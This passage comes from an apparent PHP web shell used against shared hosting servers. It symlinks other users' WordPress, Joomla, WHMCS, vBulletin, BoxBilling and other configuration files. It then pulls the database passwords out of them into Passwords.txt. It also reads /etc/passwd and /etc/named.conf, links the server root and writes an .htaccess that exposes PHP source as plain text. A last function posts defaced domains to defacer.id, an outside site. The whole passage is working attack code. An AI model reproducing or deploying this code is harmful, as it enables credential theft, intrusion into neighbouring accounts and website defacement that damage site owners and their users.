1972. @symlink('/home3/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
1973. @symlink('/home3/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
1974. @symlink('/home3/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
1975. @symlink('/home3/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
1976. @symlink('/home3/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
1977. @symlink('/home3/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
1978. @symlink('/home3/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
1979. @symlink('/home3/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
1980.  
1981. //Home4
1982.  
1983. @symlink('/home4/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
1984. @symlink('/home4/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
1985. @symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
1986. @symlink('/home4/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
1987. @symlink('/home4/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
1988. @symlink('/home4/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
1989. @symlink('/home4/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
1990. @symlink('/home4/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
1991. @symlink('/home4/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
1992. @symlink('/home4/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
1993. @symlink('/home4/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
1994. @symlink('/home4/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
1995. @symlink('/home4/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
1996. @symlink('/home4/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
1997. @symlink('/home4/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
1998. @symlink('/home4/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
1999. @symlink('/home4/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
2000. @symlink('/home4/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
2001. @symlink('/home4/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
2002. @symlink('/home4/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
2003. @symlink('/home4/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
2004. @symlink('/home4/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
2005. @symlink('/home4/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
2006. @symlink('/home4/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
2007. @symlink('/home4/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
2008. @symlink('/home4/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
2009. @symlink('/home4/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
2010. @symlink('/home4/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
2011. @symlink('/home4/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
2012. @symlink('/home4/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
2013. @symlink('/home4/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
2014. @symlink('/home4/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
2015. @symlink('/home4/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
2016. @symlink('/home4/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
2017. @symlink('/home4/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
2018. @symlink('/home4/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
2019. @symlink('/home4/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
2020. @symlink('/home4/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
2021. @symlink('/home4/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
2022. @symlink('/home4/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
2023. @symlink('/home4/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
2024. @symlink('/home4/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
2025. @symlink('/home4/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
2026. @symlink('/home4/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
2027. @symlink('/home4/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
2028. @symlink('/home4/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
2029. @symlink('/home4/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
2030. @symlink('/home4/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
2031. @symlink('/home4/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
2032. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
2033. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
2034. @symlink('/home4/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
2035. @symlink('/home4/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
2036. @symlink('/home4/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
2037. @symlink('/home4/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
2038. @symlink('/home4/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
2039. @symlink('/home4/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
2040. @symlink('/home4/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
2041. @symlink('/home4/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
2042. @symlink('/home4/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
2043. @symlink('/home4/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
2044. @symlink('/home4/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
2045. @symlink('/home4/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
2046. @symlink('/home4/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
2047. @symlink('/home4/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
2048. @symlink('/home4/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
2049. @symlink('/home4/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
2050. @symlink('/home4/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
2051. @symlink('/home4/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
2052. @symlink('/home4/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
2053. @symlink('/home4/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
2054. @symlink('/home4/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
2055. @symlink('/home4/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
2056. @symlink('/home4/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
2057. @symlink('/home4/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
2058. @symlink('/home4/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
2059. @symlink('/home4/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
2060. @symlink('/home4/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
2061. @symlink('/home4/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
2062. @symlink('/home4/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
2063. @symlink('/home4/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
2064. @symlink('/home4/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
2065. @symlink('/home4/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
2066. @symlink('/home4/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
2067. @symlink('/home4/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
2068. @symlink('/home4/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
2069. @symlink('/home4/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
2070. @symlink('/home4/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
2071. @symlink('/home4/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
2072. @symlink('/home4/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
2073. @symlink('/home4/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
2074. @symlink('/home4/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
2075. @symlink('/home4/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
2076. @symlink('/home4/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
2077. @symlink('/home4/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
2078. @symlink('/home4/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
2079. @symlink('/home4/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
2080. @symlink('/home4/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
2081. @symlink('/home4/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
2082. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
2083. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
2084. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
2085. @symlink('/home4/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
2086. @symlink('/home4/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
2087. @symlink('/home4/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
2088. @symlink('/home4/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
2089. @symlink('/home4/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
2090. @symlink('/home4/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
2091. @symlink('/home4/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
2092. @symlink('/home4/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
2093. @symlink('/home4/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
2094. @symlink('/home4/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
2095. @symlink('/home4/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
2096. @symlink('/home4/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
2097. @symlink('/home4/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
2098. @symlink('/home4/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
2099. @symlink('/home4/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
2100. @symlink('/home4/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
2101. @symlink('/home4/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
2102. @symlink('/home4/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
2103. @symlink('/home4/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
2104. @symlink('/home4/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
2105. @symlink('/home4/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
2106. @symlink('/home4/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
2107. @symlink('/home4/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
2108. @symlink('/home4/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
2109. @symlink('/home4/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
2110. @symlink('/home4/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
2111. @symlink('/home4/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
2112. @symlink('/home4/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
2113. @symlink('/home4/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
2114. @symlink('/home4/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
2115. @symlink('/home4/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
2116. @symlink('/home4/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
2117. @symlink('/home4/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
2118. @symlink('/home4/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
2119. @symlink('/home4/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
2120. @symlink('/home4/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
2121. @symlink('/home4/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
2122. @symlink('/home4/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
2123. @symlink('/home4/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
2124. @symlink('/home4/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
2125. @symlink('/home4/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
2126. @symlink('/home4/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
2127. @symlink('/home4/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
2128. @symlink('/home4/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
2129. @symlink('/home4/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
2130. @symlink('/home4/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
2131. @symlink('/home4/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
2132. @symlink('/home4/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
2133. @symlink('/home4/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
2134. @symlink('/home4/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
2135. @symlink('/home4/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
2136. @symlink('/home4/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
2137. @symlink('/home4/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
2138. @symlink('/home4/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
2139. @symlink('/home4/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
2140. @symlink('/home4/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
2141. @symlink('/home4/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
2142. @symlink('/home4/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
2143. @symlink('/home4/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
2144. @symlink('/home4/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
2145. @symlink('/home4/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
2146. @symlink('/home4/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
2147. @symlink('/home4/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
2148. @symlink('/home4/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
2149. @symlink('/home4/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
2150. @symlink('/home4/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
2151. @symlink('/home4/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
2152. @symlink('/home4/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
2153. @symlink('/home4/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
2154. @symlink('/home4/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
2155. @symlink('/home4/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
2156. @symlink('/home4/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
2157. @symlink('/home4/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
2158. @symlink('/home4/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
2159. @symlink('/home4/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
2160. @symlink('/home4/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
2161. @symlink('/home4/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
2162. @symlink('/home4/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
2163.  
2164. }
2165.  
2166. //password grab
2167.  
2168. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)
2169. {
2170.  
2171. $ar0=explode($marqueurDebutLien, $text);
2172. $ar1=explode($marqueurFinLien, $ar0[1]);
2173. $ar=trim($ar1[0]);
2174. return $ar;
2175. }
2176.  
2177. $ffile=fopen('Passwords.txt','a+');
2178.  
2179.  
2180. $r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/cox_symconf/";
2181. $re=$r;
2182. $confi=array("-Wordpress.txt","-Joomla.txt","-WHMCS.txt","-Vbulletin.txt","-Other.txt","-Zencart.txt","-Hostbills.txt","-SMF.txt","-Drupal.txt","-OsCommerce.txt","-MyBB.txt","-PHPBB.txt","-IPB.txt","-BoxBilling.txt");
2183.  
2184. $users=file("/etc/passwd");
2185. foreach($users as $user)
2186. {
2187.  
2188. $str=explode(":",$user);
2189. $usersss=$str[0];
2190. foreach($confi as $co)
2191. {
2192.  
2193.  
2194. $uurl=$re.$usersss.$co;
2195. $uel=$uurl;
2196.  
2197. $ch = curl_init();
2198.  
2199. curl_setopt($ch, CURLOPT_URL, $uel);
2200. curl_setopt($ch, CURLOPT_HEADER, 1);
2201. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2202. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
2203. curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
2204. $result['EXE'] = curl_exec($ch);
2205. curl_close($ch);
2206. $uxl=$result['EXE'];
2207.  
2208.  
2209. if($uxl && preg_match('/table_prefix/i',$uxl))
2210. {
2211.  
2212. //Wordpress
2213.  
2214. $dbp=entre2v2($uxl,"DB_PASSWORD', '","');");
2215. if(!empty($dbp))
2216. $pass=$dbp."\n";
2217. fwrite($ffile,$pass);
2218.  
2219. }
2220. elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))
2221. {
2222.  
2223. //WHMCS
2224.  
2225. $dbp=entre2v2($uxl,"db_password = '","';");
2226. if(!empty($dbp))
2227. $pass=$dbp."\n";
2228. fwrite($ffile,$pass);
2229.  
2230. }
2231.  
2232.  
2233. elseif($uxl && preg_match('/dbprefix/i',$uxl))
2234. {
2235.  
2236. //Joomla
2237.  
2238. $db=entre2v2($uxl,"password = '","';");
2239. if(!empty($db))
2240. $pass=$db."\n";
2241. fwrite($ffile,$pass);
2242. }
2243. elseif($uxl && preg_match('/admincpdir/i',$uxl))
2244. {
2245.  
2246. //Vbulletin
2247.  
2248. $db=entre2v2($uxl,"password'] = '","';");
2249. if(!empty($db))
2250. $pass=$db."\n";
2251. fwrite($ffile,$pass);
2252.  
2253. }
2254. elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))
2255. {
2256.  
2257. //Other
2258.  
2259. $db=entre2v2($uxl,"DB_PASSWORD', '","');");
2260. if(!empty($db))
2261. $pass=$db."\n";
2262. fwrite($ffile,$pass);
2263. }
2264. elseif($uxl && preg_match('/dbpass/i',$uxl))
2265. {
2266.  
2267. //Other
2268.  
2269. $db=entre2v2($uxl,"dbpass = '","';");
2270. if(!empty($db))
2271. $pass=$db."\n";
2272. fwrite($ffile,$pass);
2273. }
2274. elseif($uxl && preg_match('/dbpass/i',$uxl))
2275. {
2276.  
2277. //Other
2278.  
2279. $db=entre2v2($uxl,"dbpass = '","';");
2280. if(!empty($db))
2281. $pass=$db."\n";
2282. fwrite($ffile,$pass);
2283.  
2284. }
2285. elseif($uxl && preg_match('/dbpass/i',$uxl))
2286. {
2287.  
2288. //Other
2289.  
2290. $db=entre2v2($uxl,"dbpass = \"","\";");
2291. if(!empty($db))
2292. $pass=$db."\n";
2293. fwrite($ffile,$pass);
2294. }
2295.  
2296.  
2297. }
2298. }
2299. echo "<center>
2300. <a href=\"cox_symconf/root/\">Root Server</a>
2301. <br><a href=\"cox_symconf/Passwords.txt\">Passwords</a>
2302. <br><a href=\"cox_symconf/\">Configurations</a></center>";
2303. }
2304. else
2305. {
2306. echo "<center>
2307. <form method=\"POST\">
2308. <textarea name=\"passwd\" class='area' rows='15' cols='60'>";
2309. $file = '/etc/passwd';
2310. $read = @fopen($file, 'r');
2311. if ($read){
2312. $body = @fread($read, @filesize($file));
2313. echo "".htmlentities($body)."";
2314. }
2315. elseif(!$read)
2316. {
2317. $read = @show_source($file) ;
2318. }
2319. elseif(!$read)
2320. {
2321. $read = @highlight_file($file);
2322. }
2323. elseif(!$read)
2324. {
2325. for($uid=0;$uid<1000;$uid++)
2326. {
2327. $ara = posix_getpwuid($uid);
2328. if (!empty($ara))
2329. {
2330. while (list ($key, $val) = each($ara))
2331. {
2332. print "$val:";
2333. }
2334. print "\n";
2335. }}}
2336.  
2337. flush();
2338.  
2339. echo "</textarea>
2340. <p><input name=\"m\" size=\"80\" value=\"Start\" type=\"submit\"/></p>
2341. </form></center>";
2342. }
2343. }
2344. }
2345. elseif($_GET['do'] == 'symlink') {
2346. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
2347. $d0mains = @file("/etc/named.conf");
2348. ##httaces
2349. if($d0mains){
2350. @mkdir("cox_sym",0777);
2351. @chdir("cox_sym");
2352. @exe("ln -s / root");
2353. $file3 = 'Options Indexes FollowSymLinks
2354. DirectoryIndex jancox.htm
2355. AddType text/plain .php
2356. AddHandler text/plain .php
2357. Satisfy Any';
2358. $fp3 = fopen('.htaccess','w');
2359. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
2360. echo "
2361. <table align=center border=1 style='width:60%;border-color:#333333;'>
2362. <tr>
2363. <td align=center><font size=2>S. No.</font></td>
2364. <td align=center><font size=2>Domains</font></td>
2365. <td align=center><font size=2>Users</font></td>
2366. <td align=center><font size=2>Symlink</font></td>
2367. </tr>";
2368. $dcount = 1;
2369. foreach($d0mains as $d0main){
2370. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
2371. flush();
2372. if(strlen(trim($domains[1][0])) > 2){
2373. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2374. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
2375. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
2376. <td>".$user['name']."</td>
2377. <td><a href='$full/cox_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
2378. flush();
2379. $dcount++;}}}
2380. echo "</table>";
2381. }else{
2382. $TEST=@file('/etc/passwd');
2383. if ($TEST){
2384. @mkdir("cox_sym",0777);
2385. @chdir("cox_sym");
2386. exe("ln -s / root");
2387. $file3 = 'Options Indexes FollowSymLinks
2388. DirectoryIndex jancox.htm
2389. AddType text/plain .php
2390. AddHandler text/plain .php
2391. Satisfy Any';
2392. $fp3 = fopen('.htaccess','w');
2393. $fw3 = fwrite($fp3,$file3);
2394. @fclose($fp3);
2395. echo "
2396. <table align=center border=1><tr>
2397. <td align=center><font size=3>S. No.</font></td>
2398. <td align=center><font size=3>Users</font></td>
2399. <td align=center><font size=3>Symlink</font></td></tr>";
2400. $dcount = 1;
2401. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
2402. while(!feof($file)){
2403. $s = fgets($file);
2404. $matches = array();
2405. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2406. $matches = str_replace("home/","",$matches[1]);
2407. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2408. continue;
2409. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
2410. <td align=center><font class=txt>" . $matches . "</td>";
2411. echo "<td align=center><font class=txt><a href=$full/cox_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2412. $dcount++;}fclose($file);
2413. echo "</table>";}else{if($os != "Windows"){@mkdir("cox_sym",0777);@chdir("cox_sym");@exe("ln -s / root");$file3 = '
2414. Options Indexes FollowSymLinks
2415. DirectoryIndex jancox.htm
2416. AddType text/plain .php
2417. AddHandler text/plain .php
2418. Satisfy Any
2419. ';
2420. $fp3 = fopen('.htaccess','w');
2421. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
2422. echo "
2423. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
2424. <table align=center border=1><tr>
2425. <td align=center><font size=3>ID</font></td>
2426. <td align=center><font size=3>Users</font></td>
2427. <td align=center><font size=3>Symlink</font></td></tr>";
2428. $temp = "";$val1 = 0;$val2 = 1000;
2429. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
2430. if ($uid)$temp .= join(':',$uid)."\n";}
2431. echo '<br/>';$temp = trim($temp);$file5 =
2432. fopen("test.txt","w");
2433. fputs($file5,$temp);
2434. fclose($file5);$dcount = 1;$file =
2435. fopen("test.txt", "r") or exit("Unable to open file!");
2436. while(!feof($file)){$s = fgets($file);$matches = array();
2437. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
2438. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2439. continue;
2440. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
2441. <td align=center><font class=txt>" . $matches . "</td>";
2442. echo "<td align=center><font class=txt><a href=$full/cox_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2443. $dcount++;}
2444. fclose($file);
2445. echo "</table></div></center>";unlink("test.txt");
2446. } else
2447. echo "<center><font size=3>Cannot create Symlink</font></center>";
2448. }
2449. }
2450. }
2451. elseif($_GET['do'] == 'defacerid') {
2452. echo "<center><form method='post'>
2453. <u>Defacer</u>: <br>
2454. <input type='text' name='hekel' size='50' value='0x1999'><br>
2455. <u>Team</u>: <br>
2456. <input type='text' name='tim' size='50' value='Indonesian Code Party'><br>
2457. <u>Domains</u>: <br>
2458. <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
2459. <input type='submit' name='go' value='Submit' style='width: 450px;'>
2460. </form>";
2461. $site = explode("\r\n", $_POST['sites']);
2462. $go = $_POST['go'];
2463. $hekel = $_POST['hekel'];
2464. $tim = $_POST['tim'];
2465. if($go) {
2466. foreach($site as $sites) {
2467. $zh = $sites;
2468. $form_url = "https://www.defacer.id/notify";
2469. $data_to_post = array();
2470. $data_to_post['attacker'] = "$hekel";
2471. $data_to_post['team'] = "$tim";
2472. $data_to_post['poc'] = 'SQL Injection';
2473. $data_to_post['url'] = "$zh";
2474. $curl = curl_init();
2475. curl_setopt($curl,CURLOPT_URL, $form_url);
2476. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
2477. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
2478. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
